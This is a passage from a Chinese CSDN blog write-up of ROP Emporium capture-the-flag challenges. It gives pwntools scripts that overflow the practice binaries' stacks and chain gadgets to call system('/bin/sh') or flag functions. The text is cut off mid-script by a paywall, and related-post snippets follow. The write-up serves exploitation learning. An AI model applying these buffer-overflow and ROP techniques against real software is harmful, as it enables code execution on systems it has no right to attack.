ROP Emporium一系列题

最新推荐文章于 2022-03-26 10:27:41 发布
最新推荐文章于 2022-03-26 10:27:41 发布
阅读量502 收藏 2
点赞数 2
分类专栏: CTF 文章标签: 安全 github 编程语言 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44296844/article/details/103648025
版权
本文介绍了在ROP Emporium网站上进行的一系列安全挑战,涉及32位和64位系统的ROP(Return-Oriented Programming)技术。通过解决ret2win、split、callme、write4、badchars、fluff、pivot等题目,作者详细探讨了如何利用gadget、处理badchars、栈迁移和函数地址泄露等问题。挑战中还提到了工具如ROPgadget的使用,以及在不同场景下如何构造payload来完成目标。
摘要由CSDN通过智能技术生成

Rop Emporium

最近在学习ROP,发现ROP Emporium这个网站上题目挺好,就一直在做,我这里用到查gadget的工具是ROPgadget,其他工具也是可以的。因为是直接从笔记上粘贴的,所以没有排版啥的,。。

ret2win_32

简单的覆盖返回地址跳转到后门函数

#coding="utf-8"
from pwn import *

sh=process("./ret2win32")
payload="a"*0x28+"a"*4+"\x59\x86\x04\x08"
sh.recvuntil(">")

sh.sendline(payload)
sh.interactive()

ret2win_64

和32位一样,覆盖返回地址跳转到后门函数

from pwn import *

sh=process("./ret2win")
payload="a"*0x20+"a"*8+p64(0x0400811)
sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

split_32

程序的system中不是/bin/sh,通过查找字符串发现在数据段,将参数数据段参数传递给system就ok了

from pwn import *

sh=process("./split32")
payload="a"*0x28+"a"*4+p32(0x08048657)+p32(0x0804a030)
sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

split_64

64位和32位有点不一样,在传参方面64位前几个参数是放在rdi,rsi,rdx,rcx,r8,r9中,所以需要将参数放到rdi中才可以调用成功

#coding="utf-8"
from pwn import *

sh=process("./split")
system_addr=0x0400810
rdi_addr=0x0400883
flag_addr=0x0601060
payload='a'*0x20+'a'*0x8+p64(rdi_addr)+p64(flag_addr)+p64(system_addr)
#当程序ret时,进入rdi_addr,然后rdi再ret到system_addr每一次esp指向都不一样
sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

callme_32

程序中没有system和/bin/sh,给了一个.so文件,用IDA查看发现程序通过callme_one函数将flag文件导入,通过callme_two和callme_three函数将flag解密输出,这三个函数还需要在0x1,0x2,0x3这三个参数,由于.so文件相当于在调用动态链接库,没有办法esp自减,所以我们利用程序中的gadget来平衡一下栈

#coding="utf-8"

from pwn import *

sh=process("./callme32")
callme_one_addr=0x080485c0
callme_two_addr=0x08048620
callme_three_addr=0x080485b0
gadget_addr=0x080488a9
payload="a"*0x28+"a"*4
payload+=p32(callme_one_addr)+p32(gadget_addr)+p32(0x1)+p32(0x2)+p32(0x3)
payload+=p32(callme_two_addr)+p32(gadget_addr)+p32(0x1)+p32(0x2)+p32(0x3)
payload+=p32(callme_three_addr)+p32(gadget_addr)+p32(0x1)+p32(0x2)+p32(0x3)
sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

callme_64

和32基本一样,注意传参问题就好

#coding="utf-8"

from pwn import *

sh=process("./callme")
gadget_addr=0x0401ab0
callme_one_addr=0x0401850
callme_two_addr=0x0401870
callme_three_addr=0x0401810
payload="a"*0x20+"a"*0x8
payload+=p64(gadget_addr)+p64(0x1)+p64(0x2)+p64(0x3)+p64(callme_one_addr)
payload+=p64(gadget_addr)+p64(0x1)+p64(0x2)+p64(0x3)+p64(callme_two_addr)
payload+=p64(gadget_addr)+p64(0x1)+p64(0x2)+p64(0x3)+p64(callme_three_addr)
sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

write4_32

程序中只有system函数,没有我们需要的/bin/sh,需要我们自己构造,但是我们要向将自己构造的写入到程序,就要知道程序bss段或者data段是否可写,以及他们的空间是否足够。另外需要注意的是,我们这里是 32 位程序,每次只能写入 4 个字节,所以要分成两次写入,还得注意字符对齐,有没有截断字符( \x00 , \x0a 等)之类的问
题,比如这里 /bin/sh 只有七个字节,我们可以使用 /bin/sh\x00 或者/bin//sh

#coding="uft-8"

from pwn import *

sh=process("./write432")
system_addr=0x0804865a           #system_plt_addr=0x08048430
pop_pop_addr=0x080486da
mov_addr=0x08048670
data_addr=0x0804a028

payload="a"*0x28+"a"*4
payload+=p32(pop_pop_addr)+p32(data_addr)+"/bin"+p32(mov_addr)
payload+=p32(pop_pop_addr)+p32(data_addr+4)+"//sh"+p32(mov_addr)

#payload+=p32(pop_pop_addr)+p32(data_addr+4)+"/sh\x00"+p32(mov_addr)

payload+=p32(system_addr)+p32(data_addr)         #p32(system_plt_addr)   

sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

write4_64

64位一次写入就好了

#coding="utf-8"

from pwn import *

sh=process("./write4")
system_plt_addr=0x04005e0
data_addr=0x0601050
mov_ret_addr=0x0400820
pop_pop_addr=0x0400890
pop_rdi_addr=0x0400893

payload="a"*0x20+"a"*0x8
payload+=p64(pop_pop_addr)+p64(data_addr)+"/bin/sh\x00"+p64(mov_ret_addr)
payload+=p64(pop_rdi_addr)+p64(data_addr)+p64(system_plt_addr)

sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

badchars_32

我们依然要将 /bin/sh 写入到进程内存中,但这一次程序在读取,输入时会对敏感字符进行检查。处理敏感字符在利用开发中是经常要用到的,不仅仅是要对参数进行编码,有时甚至地址也要如此。这里我们使用简单的异或操作来对字符串编码和解码。

#coding="utf-8"

from pwn import *

sh=process("./badchars32")

pop_ebx_ecx_addr=0x08048896
pop_esi_edi_addr=0x08048899
mov_edi_esi_addr=0x08048893
xor_addr=0x08048890
system_plt_addr=0x080484e0
bss_addr=0x0804a040
#encode
binsh=""
xor_byte=0x2

for i in "/bin/sh\x00":
	c=ord(i) ^ xor_byte
	binsh+=chr(c)
#write
payload="a"*44
payload+=p32(pop_esi_edi_addr)+binsh[0:4]+p32(bss_addr)+p32(mov_edi_esi_addr)
payload+=p32(pop_esi_edi_addr)+binsh[4:8]+p32(bss_addr+4)+p32(mov_edi_esi_addr)
#code
for i in range(len(binsh)):
	payload+=p32(pop_ebx_ecx_addr)
	payload+=p32
最低0.47元/天 解锁文章
Gzero__
关注
专栏目录
小白详解rop emporium
BadRer的博客
08-02 2112
小白详解rop emporium 前言 rop emporium网站上提供了许多构造rop的challenge,作为小白的我从这里开始,专注于rop链的构造。 ps:写完放了好久结果没投出去,我好菜啊-。- 题目 0x0 ret2win32 IDA打开,很容易找到溢出点 char s; // [esp+0h][ebp-28h]可以看出s距ebp的偏移为0x28 m...
rOpbaby-CTFPWN ROP练习
08-21
DefConCTF 2015 Quals CTFPWN ROP练习 可用于练习基础的ROP
ROP Emporium-callme
网安星空
01-06 442
ROP Emporium网站CTF相关PWN靶场callme,主要是PWN栈溢出中ROP技巧的练习
ROP_Emporium_callme
Starr
03-24 1235
文章目录1. split32信息收集黑盒测试反汇编调试分析Exp2. split参考文章 1. split32 信息收集 这个提供了以下文件: callme32可执行程序 libcallme32.so动态库 key1.dat,key2.dat encrypted_flag.dat 不知道callme32格式那里不对,checksec会报错NameError: name 'dt_rpath' is not defined。一会黑盒测试如果崩溃了就说明有canary,而pie可以从入口点判断: $ rea
rop emporium call me (x64)
u014377094的博客
02-10 1433
这道惊喜点在于.so文件也可以拖到ida里逆向,服! 下面是解过程: 左边发现奇怪的callme-one,two,three. 但是人家动态链接了,不知道内容是什么就无法利用,使用ida,把so文件拽里面 告诉我们,按这个参数就correctly了。 下面反倒过程平平无奇了 使用ROPgadget 找到三个参数的pop rdi rsi rdx ret 注意:当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。用栈时右到左,但6.
ROP Emporium write4
u014377094的博客
02-10 2399
checksec还是老样子 ida打开 依旧是pwnme函数,点开是个plt跳转 文件给了.so,那么ida打开 明显栈溢出 继续找可利用的漏洞,注意看notice,提示打开printfile 我们可以看到这里传参是个指针,下面fopen后fgets接着puts了,fopen是拿来开文件的,文件里不正是flag,这次倒是让system休息了一回。 现在我们要做的就是让al指向写有文件名的地址。现在难点在如何在一块区域写下文件名,并且知道这块地址是多少。栈想来想去也不知道怎么做,但.
Rompmporium漏洞:ROP Emporium漏洞
02-15
ROP Emporium是一个在线平台,提供了一系列的挑战,旨在帮助安全研究人员和逆向工程师学习和实践ROP技术。 **什么是ROP(Return-Oriented Programming)?** ROP允许攻击者通过拼接一系列预先存在的、短小的指令...
CTF|rop emporium pivot32 writeup (栈迁移型)
skyattractive的博客
06-13 681
CTF|rop emporium pivot32 writeup (栈迁移型) 题目来源:https://ropemporium.com/challenge/pivot.html malloc生成了一个堆区 pwnme函数里面有两个gets函数,存在栈溢出的地方,在第二个gets,但是他在填充完s之后所剩下的空间位58-0x28-4,是一个很小的空间,在这样的狭小空间里面是不足以构造rop chain的。 stack pivoting 具有这样特点的题目叫做stack pivoting。 stack
ROP_Emporium_write4
Starr
03-24 815
文章目录1. write432信息收集黑盒测试反汇编思路Exp2. write4反汇编PayloadExp3. 参考文章 1. write432 信息收集 题目给了3个文件:write432, libwrite432.so, flag.txt。 $ file write432 write432: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.
64位函数参数传递方式
热门推荐
qq_35467337的博客
03-08 1万+
64位函数传参方式
rop emporium 2020】write4
^_^
02-06 464
这篇博客主要是关于rop emporium(2020年7月的版本)的ret2win这道的学习记录 因为网上都是比较早版本的解,所以写了这篇博客,这道与之前的版本的区别是没有system函数,但是有另外一个print_file函数来获取flag,所以本质上还是差不多的。 题目链接:https://ropemporium.com/challenge/split.html 备注:以下题目都是在ubuntu16.04下完成 32位 溢出点还是44… 看了下网上给的教程是利用system函数。但是好像网站更.
ROP_Emporium_badchars
Starr
03-25 777
文章目录1. badchars32信息收集黑盒测试反汇编思路Exp2. badchars信息反汇编构造Payload调试分析Exp3. 参考文章 1. badchars32 信息收集 题目提供了一个可执行文件badchars32, 一个动态库libbadchars32.so,一个flag.txt。 $ file badchars32 badchars32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked
64位栈溢出简单rop与简单例的复现
goat_2003的博客
09-18 691
首先还是找到关键函数 可以看到有read栈溢出漏洞,有system函数,查看字符串,还可以看到"/bin/sh",既然这样,我们便可以一步到位直接通过rop将/bin/sh装入system函数中getshell。 如何通过rop实现传参呢?64位ELF是通过寄存器存放参数的,所以我们要想办法将/bin/sh放入rdi中并紧接着调用system函数。 那么该如何实现呢?我们假设一下,先通过pop edi将/bin/sh的地址压入edi中,然后再执行ret,并将此时的esp所指向栈空间的值改为system函数
ROPEmporium通关全解(四)
Yale的博客
12-24 390
前言 1.关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 2. 本系列rop实战题目的背景 来自ROPEmporium...
ROP Emporium badchars32 wp
devil8123665的博客
03-26 779
wp 1 IDA进行分析发现溢出函数 1、溢出函数 int pwnme() { unsigned int v1; // [esp+0h] [ebp-38h] unsigned int i; // [esp+4h] [ebp-34h] unsigned int j; // [esp+8h] [ebp-30h] char v4[36]; // [esp+10h] [ebp-28h] BYREF ​ setvbuf(stdout, 0, 2, 0); puts("badchars..
ROP Emporium-split
网安星空
01-05 378
ROP Emporium是一个通过一系列的挑战来学习ROP的网站,ROP常用于PWN的场景,是CTF的必备技能
ROP_Emporium_split
Starr
03-24 269
文章目录1. split32信息收集黑盒测试反汇编Exp调试分析2. split黑盒测试反汇编Exp参考文章 1. split32 信息收集 $ file split32 split32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=76cb700a2ac0484f
ROP2 ROP的启蒙
snowleopard_bin的博客
08-05 408
from pwn import * cn = remote('hackme.inndy.tw',7703) #context.log_level='debug' elf = ELF('rop2') syscall = elf.symbols['syscall'] print "%x"%syscall over = elf.symbols['overflow'] bss = elf.bss() ...
Rop框架详解:构建服务开放平台
"Rop轻量级开发指南是专注于服务开放平台构建的框架,与纯技术型的WebService框架如CXF、Jersey不同,Rop提供了包括应用认证、会话管理、安全控制、错误模型、版本管理和超时限制等一系列解决方案。它的设计借鉴了...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值